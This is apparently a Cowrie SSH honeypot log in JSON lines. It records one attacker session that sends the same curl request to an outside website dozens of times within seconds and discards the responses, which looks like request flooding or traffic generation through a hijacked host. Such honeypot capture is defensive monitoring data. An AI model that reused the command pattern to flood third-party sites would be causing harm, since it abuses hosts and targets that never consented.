{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.567037Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.567971Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.607347Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.608368Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.647458Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.648785Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.686314Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.687862Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.724981Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.726237Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.768399Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.769404Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.812130Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.813302Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.849713Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.850791Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.888591Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.889520Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.927168Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.928285Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:21.966529Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:21.967617Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.008242Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.009498Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.049322Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.050246Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.095920Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.096953Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.138609Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.139944Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.177406Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.178472Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.217926Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.218963Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.256712Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.258494Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.302601Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.303638Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.340497Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.341232Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.378092Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.379080Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.419197Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.420076Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.456585Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.457466Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.495838Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.496771Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.534487Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.535501Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.573736Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.574722Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.614975Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.615910Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.659790Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.660888Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.697858Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.699098Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.735745Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.736839Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.777498Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.778569Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.819194Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.820347Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.861514Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.862566Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:22.900534Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:22.901462Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.005639Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.006781Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.052433Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.053400Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.094908Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.095867Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.138746Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.139815Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.179873Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.180937Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.232458Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.233665Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.274371Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.275357Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.318963Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.320027Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.357222Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.358527Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.395754Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.396749Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.438070Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.439148Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.486525Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.487776Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.526253Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.527387Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.564234Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.565221Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.602648Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.603966Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.641228Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.642353Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.679649Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.681568Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.726177Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.727408Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.768008Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.769197Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.816566Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.818834Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.858048Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.859270Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.899040Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.900241Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.938181Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.939675Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:23.985548Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:23.986743Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.031171Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.032577Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.078912Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.080151Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.117132Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.118336Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.160741Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.161984Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.200103Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.201291Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.239014Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:24.240279Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:24.277519Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
